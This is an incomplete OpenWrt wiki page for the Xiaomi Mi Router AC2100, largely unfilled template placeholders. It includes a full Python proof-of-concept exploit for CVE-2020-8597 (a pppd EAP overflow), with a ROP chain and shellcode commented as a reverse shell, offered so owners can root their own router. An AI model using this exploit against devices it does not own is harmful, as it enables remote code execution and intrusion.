Xiaomi Mi Router AC2100

Under Construction!
This page is currently under construction. You can edit the article to help completing it.

The Xiaomi Mi Router AC2100 is a wireless router with MT7621 platform. From a technical standpoint, the spec of Xiaomi Mi Router AC2100 is highly identical to Redmi AC2100. It runs Xiaomi Router firmware by default and similarly, it requires a simple PPPOE exploit to start a shell and flash OpenWRT via command line interface.

Support Forums https://forum.openwrt.org/t/new-xiaomi-router-ac2100

Xiaomi Mi Router AC2100

None at this time.

ModelVersionSoCCPU MHzFlash MBRAM MBWLAN HardwareWLAN2.4WLAN5.0100M portsGbit portsModemUSB
Mi Router AC2100MediaTek MT7621A880128NAND128MediaTek MT7603, MediaTek MT7615b/g/na/n/ac-4--

unofficial stable build

.

Software Preparation

  • Two ethernet cables
  • Python 3 installed on your PC
  • Download OpenWrt firmware from this page
  • A script that implements CVE-2020-8597 (see below)

An POC of CVE-2020-8597, from GitHub Gist

You need to change the interface to match the name of the interface connected to the Xiaomi router. Also, change the (beginning of) MAC address on the line if src.startswith(“88:c3:97”) to match your router. The full MAC address of the router is on a sticker attached to the router.

There's a good AC2100-OpenWRT-Guide at GitHub with pictures to explain the installation procedure.

from scapy.all import *
from socket import *

interface = "enp0s31f6"

def mysend(pay,interface = interface):
    sendp(pay, iface = interface)

def packet_callback(packet):

    global sessionid, src, dst
    sessionid = int(packet['PPP over Ethernet'].sessionid)
    dst = (packet['Ethernet'].dst)
    src = (packet['Ethernet'].src)
    # In case we pick up Router -> PPPoE server packet
    if src.startswith("88:c3:97") :
        src,dst = dst,src
    print("sessionid:" + str(sessionid))
    print("src:" + src)
    print("dst:" + dst)

def eap_response_md5():

    md5 = b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\x0C\x0D\x0E\x0F\x10"

    # Reverse shell, connect to 192.168.31.177:31337

    stg3_SC =  b"\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += b"\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += b"\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += b"\xf8\xff\xa5\xaf\x1f\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += b"\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += b"\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += b"\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += b"\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += b"\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += b"\xab\x0f\x02\x24\x0c\x09\x09\x01"

    reboot_shell =  b"\x23\x01\x06\x3c"
    reboot_shell += b"\x67\x45\xc6\x34"
    reboot_shell += b"\x12\x28\x05\x3c"
    reboot_shell += b"\x69\x19\xa5\x24"
    reboot_shell += b"\xe1\xfe\x04\x3c"
    reboot_shell += b"\xad\xde\x84\x34"
    reboot_shell += b"\xf8\x0f\x02\x24"
    reboot_shell += b"\x0c\x01\x01\x01"

    #Debug sleep
    #s0 = b"\x00\x00\x00\x00"
    #s1 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    #s2 = b"\x03\x00\x00\x00"
    #s3 = b"\x01\x00\x00\x00"
    #s4 = b"\x0c\x93\x40\x00"
    #s5 = b"\x00\x00\x00\x00"

    #Debug reboot
    #s0 = b"\x00\x00\x00\x00"
    #s1 = b"\xB0\x9B\xEB\x77" # uclibc reboot(s2) base + 0xfbb0 = 77EB9BB0
    #s2 = b"\x67\x45\x23\x01"
    #s3 = b"\x01\x00\x00\x00"
    #s4 = b"\x0c\x93\x40\x00"
    #s5 = b"\x00\x00\x00\x00"

    #ra = b"\x04\xdb\x40\x00" # 0x0040db04 : move $a0, $s2 ; move $t9, $s1 ; jalr $t9

    s0 = b"\x40\x61\xF1\x77" # uclibc sleep() base + 0x6c140 = 77F16140
    s1 = b"\x01\x00\x00\x00"
    s2 = b"\x41\x41\x41\x41"
    s3 = b"\x00\x64\xFF\x7F" # 7ffd6000-7fff7000 rwxp 00000000 00:00 0          [stack]
    s4 = b"\x88\xe1\x40\x00" # pppd.txt:0x0040e188
    s5 = b"\x00\x00\x00\x00"

    ra = b"\x0C\x81\xF1\x77" # libuClibc.txt:0x0006e10c 77F1810C

    rop_chain =  (b'A' * 0x184)
    rop_chain += s0
    rop_chain += s1
    rop_chain += s2
    rop_chain += s3
    rop_chain += s4
    rop_chain += s5
    rop_chain += ra
    # Nop slide
    rop_chain += (b'\x00' * 0x100)
    # Small reboot shellcode for testing
    #rop_chain += reboot_shell
    rop_chain += stg3_SC
    # Just padding the end a little, since the last byte gets set to 0x00 and not everyone uses a 4 * 0x00 as nop
    rop_chain += (b'\x00' * 0x4)
    pay = Ether(dst=dst,src=src,type=0x8864)/PPPoE(code=0x00,sessionid=sessionid)/PPP(proto=0xc227)/EAP_MD5(id=100,value=md5,optional_name=rop_chain)
    mysend(pay)


if __name__ == '__main__':
    sniff(prn=packet_callback,iface=interface,filter="pppoes",count=1)

    eap_response_md5()

FIXME Enter values for “FILL-IN” below

Bootloader tftp server IPv4 address FILL-IN
Bootloader MAC address (special) FILL-IN
Firmware tftp image Latest OpenWrt release (NOTE: Name must contain “tftp”)
TFTP transfer window FILL-IN seconds
TFTP window start approximately FILL-IN seconds after power on
TFTP client required IP address FILL-IN

generic.sysupgrade

FIXME These are generic instructions. Update with your router's specifics.

  • Browse to http://192.168.1.1/cgi-bin/luci/mini/system/upgrade/ LuCI Upgrade URL
  • Upload image file for sysupgrade to LuCI
  • Wait for reboot

If you don't have a GUI (LuCI) available, you can alternatively upgrade via the command line. There are two command line methods for upgrading:

  • sysupgrade
  • mtd

Note: It is important that you put the firmware image into the ramdisk (/tmp) before you start flashing.

sysupgrade

  • Login as root via SSH on 192.168.1.1, then enter the following commands:
cd /tmp
wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc
sysupgrade /tmp/xxx.abc

mtd

If sysupgrade does not support this router, use mtd.

  • Login as root via SSH on 192.168.1.1, then enter the following commands:
cd /tmp
wget http://downloads.openwrt.org/snapshots/trunk/XXX/xxx.abc
mtd write /tmp/xxx.abc linux && reboot

Basic configuration After flashing, proceed with this.
Set up your Internet connection, configure wireless, configure USB port, etc.

FIXME Please fill in real values for this device, then remove the EXAMPLEs

The default network configuration is:

Interface Name Description Default configuration
br-lan EXAMPLE LAN & WiFi EXAMPLE 192.168.1.1/24
vlan0 (eth0.0) EXAMPLE LAN ports (1 to 4) EXAMPLE None
vlan1 (eth0.1) EXAMPLE WAN port EXAMPLE DHCP
wl0 EXAMPLE WiFi EXAMPLE Disabled

FIXME Please fill in real values for this device, then remove the EXAMPLEs

Numbers 0-3 are Ports 1-4 as labeled on the unit, number 4 is the Internet (WAN) on the unit, 5 is the internal connection to the router itself. Don't be fooled: Port 1 on the unit is number 3 when configuring VLANs. vlan0 = eth0.0, vlan1 = eth0.1 and so on.

Port Switch port
Internet (WAN) EXAMPLE 4
LAN 1 EXAMPLE 3
LAN 2 EXAMPLE 2
LAN 3 EXAMPLE 1
LAN 4 EXAMPLE 0

hardware.button on howto use and configure the hardware button(s). Here, we merely name the buttons, so we can use them in the above Howto.

FIXME Please fill in real values for this device, then remove the EXAMPLEs

The Xiaomi Xiaomi Mi Router AC2100 has the following buttons:

BUTTON Event
EXAMPLE Reset reset
EXAMPLE Secure Easy Setup ses
EXAMPLE No buttons at all. -

FIXME

  1. This table is automatically generated, once the correct filters for Brand and Model are set.
  2. If you see “Nothing.” instead of a table, please edit this section and adjust the filters with the proper Brand and Model. Just try, it's easy.
  3. If you still don't see a table here, or a table filled with '¿': Is there already a Techdata page available for Xiaomi Xiaomi Mi Router AC2100 ? If not: Create one.
  4. If you see a table with the desired device data, everything is OK and you can delete this text and the <WRAP> that encloses it.
  5. If it still doesn't work: Don't panic, calm down, take a deep breath and contact a wiki admin (tmomas) for help.
Nothing.

Front:
Insert photo of front of the casing

Back:
Insert photo of back of the casing

Backside label:
Insert photo of backside label

Note: This will void your warranty!

FIXME Describe what needs to be done to open the device, e.g. remove rubber feet, adhesive labels, screws, …

  • To remove the cover and open the device, do a/b/c

Main PCB:
Insert photo of PCB

port.serial general information about the serial port, serial port cable, etc.

How to connect to the Serial Port of this specific device:
Insert photo of PCB with markings for serial port

FIXME Replace EXAMPLE by real values.

Serial connection parameters
for Xiaomi Xiaomi Mi Router AC2100 @@Version@@
EXAMPLE 115200, 8N1

port.jtag general information about the JTAG port, JTAG cable, etc.

How to connect to the JTAG Port of this specific device:
Insert photo of PCB with markings for JTAG port

None so far.

COPY HERE THE BOOTLOG WITH THE ORIGINAL FIRMWARE


COPY HERE THE BOOTLOG ONCE OPENWRT IS INSTALLED AND RUNNING


Space for additional notes, links to forum threads or other resources.

FIXME Add tags below, then remove this fixme.

How to add tags

This website uses cookies. By using the website, you agree with storing cookies on your computer. Also you acknowledge that you have read and understand our Privacy Policy. If you do not agree leave the website.More information about cookies
  • Last modified: 2020/12/17 06:47
  • by lessload